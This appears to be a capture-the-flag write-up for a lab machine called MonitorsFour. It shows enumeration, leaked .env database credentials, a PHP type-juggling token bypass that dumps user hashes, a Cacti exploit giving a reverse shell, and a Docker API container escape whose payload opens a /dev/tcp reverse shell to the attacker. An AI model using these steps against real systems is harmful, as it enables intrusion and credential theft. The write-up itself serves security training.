MonitorsFour

Enumeration

  • Add to /etc/hosts
10.129.52.128 monitorsfour.htb

nmap

nmap -sC -sV -T4 10.129.46.152 #1st Result
sudo nmap -A -sU --top-port 100 10.129.46.152 #No Results
nmap -p- -A 10.129.46.152 #2nd Result

80/tcp open  http    nginx
|_http-title: MonitorsFour - Networking Solutions
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set

5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

HTTP (80)

Directory Scan

ffuf -u http://monitorsfour.htb/FUZZ -w /opt/useful/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fc 403,404

contact           [Status: 200, Size: 367, Words: 34, Lines: 5, Duration: 3381ms]
login         [Status: 200, Size: 4340, Words: 1342, Lines: 96, Duration: 3385ms]
user                [Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 3698ms]
static               [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 42ms]
views                [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 35ms]
controllers          [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 92ms]
forgot-password [Status: 200, Size: 3099, Words: 164, Lines: 84, Duration: 117ms]
.env                  [Status: 200, Size: 97, Words: 1, Lines: 6, Duration: 39ms]

Checking .env - Credentials for MarinaDB

└──╼ $cat Untitled.env 
DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r

Vhost Scan - Found Cacti

ffuf -w /opt/useful/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://10.129.46.152 -H 'Host: FUZZ.monitorsfour.htb' -fs 138

cacti                 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 664ms]
  • Add to /etc/hosts 
10.129.52.128 monitorsfour.htb cacti.monitorsfour.htb

Banner - No Results

┌─[parrot@parrot]─[/opt/useful/seclists/Discovery/DNS]
└──╼ $curl -i monitorsfour.htb
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Dec 2025 20:05:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.3.27
Set-Cookie: PHPSESSID=d0cc4ea1e420066ec00fdf574e37fdfb; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
  • Checking PHP/8.3.27
  • PHP version vulnerable to Type Juggling

Nikto - No Results

nikto -h monitorsfour.htb

The X-Content-Type-Options header is not set.
The anti-clickjacking X-Frame-Options header is not present.
Cookie PHPSESSID created without the httponly flag.

PHP Type Juggling

  • Trying Curl with Token Set
curl http://monitorsfour.htb/user?token=FFFF

{"error":"Invalid or missing token"}
  • Provides a different response, could be targeted by Magic Hashes
└──╼ $curl http://monitorsfour.htb/user?token=0
[{"id":2,"username":"admin","email":"admin@monitorsfour.htb","password":"56b32eb43e6f15395f6c46c1c9e1cd36","role":"super user","token":"8024b78f83f102da4f","name":"Marcus Higgins","position":"System Administrator","dob":"1978-04-26","start_date":"2021-01-12","salary":"320800.00"},{"id":5,"username":"mwatson","email":"mwatson@monitorsfour.htb","password":"69196959c16b26ef00b77d82cf6eb169","role":"user","token":"0e543210987654321","name":"Michael Watson","position":"Website Administrator","dob":"1985-02-15","start_date":"2021-05-11","salary":"75000.00"},{"id":6,"username":"janderson","email":"janderson@monitorsfour.htb","password":"2a22dcf99190c322d974c8df5ba3256b","role":"user","token":"0e999999999999999","name":"Jennifer Anderson","position":"Network Engineer","dob":"1990-07-16","start_date":"2021-06-20","salary":"68000.00"},{"id":7,"username":"dthompson","email":"dthompson@monitorsfour.htb","password":"8d4a7e7fd08555133e056d9aacb1e519","role":"user","token":"0e111111111111111","name":"David Thompson","position":"Database Manager","dob":"1982-11-23","start_date":"2022-09-15","salary":"83000.00"}]
  • Find Admin Credentials

admin:56b32eb43e6f15395f6c46c1c9e1cd36

56b32eb43e6f15395f6c46c1c9e1cd36md5wonderful1

Finding Magic Hashes

# Test with "magic" values that equal 0 in loose comparison
magic_values=("0" "0e0" "0e1" "0e12345" "00" "0x0" "0.0" "0 " " 0")
for value in "${magic_values[@]}"; do
	echo -n "Testing token=$value -> "
	curl -s "http://monitorsfour.htb/user?token=$value" | jq -r '.error // "SUCCESS!"'
done


Testing token=0 -> jq: error (at <stdin>:0): Cannot index array with string "error"
Testing token=0e0 -> jq: error (at <stdin>:0): Cannot index array with string "error"
Testing token=0e1 -> jq: error (at <stdin>:0): Cannot index array with string "error"
Testing token=0e12345 -> jq: error (at <stdin>:0): Cannot index array with string "error"
Testing token=00 -> jq: error (at <stdin>:0): Cannot index array with string "error"
Testing token=0x0 -> Invalid or missing token
Testing token=0.0 -> jq: error (at <stdin>:0): Cannot index array with string "error"
# Also try common "magic hashes"
# MD5 hashes that start with "0e" and contain only digits after
magic_hashes=(
"0e215962017"
"0e462097431906509019562988736854"
"0e1137126905"
"0e291242476940776845150308577824"
"0e656258624"
)
for hash in "${magic_hashes[@]}"; do
echo -n "Testing MD5 magic hash: $hash -> "
curl -s "http://monitorsadmin 	Marcus Higginsfour.htb/user?token=$hash" | jq -r '.error // "SUCCESS!"'
done

Testing MD5 magic hash: 0e215962017 -> jq: error (at <stdin>:0): Cannot index array with string "error"
Testing MD5 magic hash: 0e462097431906509019562988736854 -> jq: error (at <stdin>:0): Cannot index array with string "error"
Testing MD5 magic hash: 0e1137126905 -> jq: error (at <stdin>:0): Cannot index array with string "error"
Testing MD5 magic hash: 0e291242476940776845150308577824 -> jq: error (at <stdin>:0): Cannot index array with string "error"
Testing MD5 magic hash: 0e656258624 -> jq: error (at <stdin>:0): Cannot index array with string "error
# Test the tokens that gave jq errors - they might be valid!
tokens=("0" "0e0" "0e1" "0e12345" "00" "0.0")
for token in "${tokens[@]}"; do
echo "=== Testing token: $token ==="
curl -s "http://monitorsfour.htb/user?token=$token"
echo -e "\n"
done
=== Testing token: 0 ===
[{"id":2,"username":"admin","email":"admin@monitorsfour.htb","password":"56b32eb43e6f15395f6c46c1c9e1cd36","role":"super user","token":"8024b78f83f102da4f","name":"Marcus Higgins","position":"System Administrator","dob":"1978-04-26","start_date":"2021-01-12","salary":"320800.00"},{"id":5,"username":"mwatson","email":"mwatson@monitorsfour.htb","password":"69196959c16b26ef00b77d82cf6eb169","role":"user","token":"0e543210987654321","name":"Michael Watson","position":"Website Administrator","dob":"1985-02-15","start_date":"2021-05-11","salary":"75000.00"},{"id":6,"username":"janderson","email":"janderson@monitorsfour.htb","password":"2a22dcf99190c322d974c8df5ba3256b","role":"user","token":"0e999999999999999","name":"Jennifer Anderson","position":"Network Engineer","dob":"1990-07-16","start_date":"2021-06-20","salary":"68000.00"},{"id":7,"username":"dthompson","email":"dthompson@monitorsfour.htb","password":"8d4a7e7fd08555133e056d9aacb1e519","role":"user","token":"0e111111111111111","name":"David Thompson","position":"Database Manager","dob":"1982-11-23","start_date":"2022-09-15","salary":"83000.00"}]

Logging into monitorsfour.htb

  • Find details regarding admin User
admin Marcus Higgins
  • Trying credentials on Cacti

Enumerating Cacti - cacti.monitorsfour.htb

  • Version 1.2.28 | (c) 2004-2025 - The Cacti Group
  • Logging in using Marcus:wonderful1
python3 exploit.py -u Marcus -p wonderful1 -url http://cacti.monitorsfour.htb -i 10.10.14.128 -l 4444
nc nvlp 4444

Flag 1 - User Flag

www-data@821fbd6a43fa:/home/marcus$ cat user.txt
cat user.txt
8ef8cf7d32bdd83b73be54eb9fd85812

Flag 2 - Root Flag

www-data@821fbd6a43fa:/home/marcus$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host proto kernel_lo 
       valid_lft forever preferred_lft forever
2: eth0@if7: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether d6:17:cb:84:7b:36 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.18.0.3/16 brd 172.18.255.255 scope global eth0
       valid_lft forever preferred_lft forever
www-data@821fbd6a43fa:/home/marcus$ ip route
ip route
default via 172.18.0.1 dev eth0 
172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.3
  • Indicates it is a Docker Container
    • 172.18.0.0/16 is a common Docker bridge network
    • The @if7 suffix means this interface is veth-paired to another interface
    • 821fbd6a43fa looks exactly like a Docker container ID (12-char hex)
  • Therefore the goal is a Docker Escape

www-data@821fbd6a43fa:/home/marcus$ uname -a
uname -a
Linux 821fbd6a43fa 6.6.87.2-microsoft-standard-WSL2 
#1 SMP PREEMPT_DYNAMIC Thu Jun  5 18:30:46 UTC 2025 x86_64 GNU/Linux
  • Creating a new Docker container
cat > create_container.json <<EOF
{
"Image": "docker_setup-nginx-php:latest",
"Cmd": ["/bin/bash", "-c", "bash -i >& /dev/tcp/10.10.14.128/5555 0>&1"],
"HostConfig": {
"Binds": ["/mnt/host/c:/host_root"]
}
}
EOF
nc -nvlp 5555
curl -H 'Content-Type: application/json' -d @create_container.json "http://192.168.65.7:2375/containers/create" -o response.json
cat response.json
{"Id":"e3bb31b590f4e03157184c1d9bad2e40d52fe3a668ccd829356e2be7afa5f4f0","Warnings":[]}


curl -X POST "http://192.168.65.7:2375/containers/e3bb31b590f4e03157184c1d9bad2e40d52fe3a668ccd829356e2be7afa5f4f0/start"
root@e3bb31b590f4:/host_root/Users/Administrator/Desktop# cat root.txt
cat root.txt
755aa27aee46e147667b7a2de0d610d6